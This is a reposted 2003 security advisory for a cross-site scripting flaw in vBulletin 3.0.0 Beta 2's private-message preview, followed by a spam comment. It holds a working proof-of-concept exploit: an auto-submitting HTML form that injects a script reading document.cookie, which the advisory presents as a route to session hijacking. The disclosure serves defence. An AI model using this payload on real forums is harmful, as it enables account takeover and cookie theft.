Menüyü Gizle

Vbulletin XSS

Etiketler no_tag, 18.05.2003
------------------------------------------------------ VBulletin Private Message "Preview Message" XSS Vulnerability 14.05.2003 ------------------------------------------------------ Any kind of XSS attacks possibility. Account-Session hijacking. ------------------------------------------------------ About VBulletin; ------------------------------------------------------ PHP Based Popular Forum Application Vendor & Demo; www.vbulletin.com ------------------------------------------------------ Vulnerable; ------------------------------------------------------ vBulletin 3.0.0 Beta 2 ------------------------------------------------------ Non Vulnerable; ------------------------------------------------------ vBulletin 2.2 ------------------------------------------------------ Vendor Status; ------------------------------------------------------ Patched; This version of Vbulletin not published public yet but some of Vbulletin customers like www.sitepointforums.com (More than 23.000 members) using this. ------------------------------------------------------ Solution; ------------------------------------------------------ HTML Encoding like post thread preview page. ------------------------------------------------------ Exploit Code; ------------------------------------------------------ [html] [body] [form action="http://[victim]/forum/private.php" method="post" name="vbform"] [input type="hidden" name="do" value="insertpm" /] [input type="hidden" name="pmid" value="" /] [input type="hidden" name="forward" value="" /] [input type="hidden" name="receipt" value="0" /] [input type="text" class="bginput" name="title" value="" size="40" tabindex="2" /] [textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"][/textarea] [input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" /] [input type="submit" class="button" value="Preview Message" accesskey="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5" ] [input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked" /] [input type="checkbox" name="signature" value="1" id="cb_signature" /] [input type="checkbox" name="parseurl" value="1" id="cb_parseurl" checked="checked" /] [input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" /] [/form] [script] //Set Values and Submit // You can write your own JS codes var xss = "\"][script]alert(document.cookie)[\/script]"; document.vbform.title.value=xss; document.vbform.preview.click(); [/script] [/body] [/html] *Replace ([],<>) **You may need login first
Yorum Ekle Yorumunu Ekle - Yazıcı Versiyonu Yazıcı Versiyonu - Yorumlar için RSS Yorumlar için RSS

friendsden - 09.03.2008

Hello to everyone, I am Paula a sexy gardener and maintain a web 2.0 social network
website that is filling up with new members and looking to learn as much as possible from
my new found friends here.

Yorum Yazın


Tüm yorumlar onaydan geçmektedir, bu işlem en uzun 30 dk. sürecektir. E-mail adresleri yeni yorumları bildirme harici hiç bir başka amaçla kullanılmamaktadır ve sitede gözükmemektedir.



Captcha Kodu